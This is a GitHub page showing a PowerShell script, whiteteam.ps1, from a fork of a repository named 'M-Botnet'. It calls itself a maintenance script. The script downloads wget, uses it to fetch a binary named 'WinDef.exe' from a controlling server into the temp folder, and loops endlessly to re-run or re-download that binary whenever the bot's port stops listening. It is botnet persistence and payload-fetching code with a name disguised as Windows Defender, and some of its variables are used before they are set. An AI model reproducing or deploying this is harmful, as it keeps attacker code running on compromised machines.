forked from M507/M-Botnet
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathwhiteteam.ps1
106 lines (85 loc) · 2.71 KB
/
whiteteam.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
# powershell -ExecutionPolicy ByPass -File runYourselfEveryBlabla.ps1
# Maintenace script
$FIP = ""
function updatePort($FIP){
$url = 'http://$FIP/whiteteam/port.html';
$response = (Invoke-RestMethod -Uri $url).Trim();
return $response;
}
function updateVName($FIP){
$url = 'http://$FIP/whiteteam/index.html';
$response = (Invoke-RestMethod -Uri $url).Trim();
return $response;
}
function get_wget {
$filename = "wget.exe"
$wgetBinLocation = '' + $save_dir + '\' + $filename;
#$client = New-Object System.Net.WebClient
#https://eternallybored.org/misc/wget/
write-host "Downloading Wget!"
$url = "https://eternallybored.org/misc/wget/1.20/32/wget.exe"
(New-Object System.Net.WebClient).DownloadFile($url, $wgetBinLocation)
return $wgetBinLocation
}
"
Get $VName from $FIP /whiteteam/ and return the location
"
function get_dad($VName) {
$Location = '' + $save_dir + '\' + $VName;
Start-Process -FilePath $wgetBinLocation -Args " https://$FIP/whiteteam/WinDef.exe -O $Location" -passthru -NoNewWindow -Wait
return $Location
}
function Start-Mint($FLocation,$exefile,$PORT) {
try
{
while ($true) {
# Get the port that u the bot uses.
$R = netstat -a | findstr LISTENING | findstr $PORT
Write-Output $R
Write-Output $R.length
# If there is more than one line in the output That means you do not have to run the bin again.
if ($R.length -gt 1) {
Write-Output "It's open."
# Do something if it's running
} Else { # Else it should execute the Bin/WinDef.exe again.
#Start-Process -FilePath "1.ps1" -passthru -NoNewWindow -Wait
Write-Output "$env:temp\1.ps1"
# Check if a file exsit
if ( Test-Path -Path $exefile){
Start-Process -FilePath $exefile -passthru -NoNewWindow
} Else {
# If it does not exist get it from the server or Find another way to get a new file.
# Maybe get a site and from the output, Trim() them then get the new name.
$url = 'http://10.1.1.1/whiteteam/';
$response = (Invoke-RestMethod -Uri $url).Trim();
echo $response
$exefile = get_dad $response
Start-Mint $FLocation $exefile
}
}
# Wait before it runs again
Start-Sleep -Milliseconds 1200
}
}
finally
{
Start-Mint
}
}
# Get Wget
$wgetBinLocation = '' + $save_dir + '\wget.exe';
if (!(Test-Path $wgetBinLocation)){
Write-Output "The file does not exist"
$wgetBinLocation = get_wget
}
#Setup all values
$save_dir = $env:temp
$PORT = updatePort $FIP
$filename = updateVName $FIP
$exefile = '' + $save_dir + '\' + $filename;
#$save_path = '' + $save_dir + '\' + $filename;
# Get the location of the binrary in the LHost
#$FLocation = get_dad $filename
# Start the real work
#Start-Mint $FLocation $exefile $PORT
#echo "end"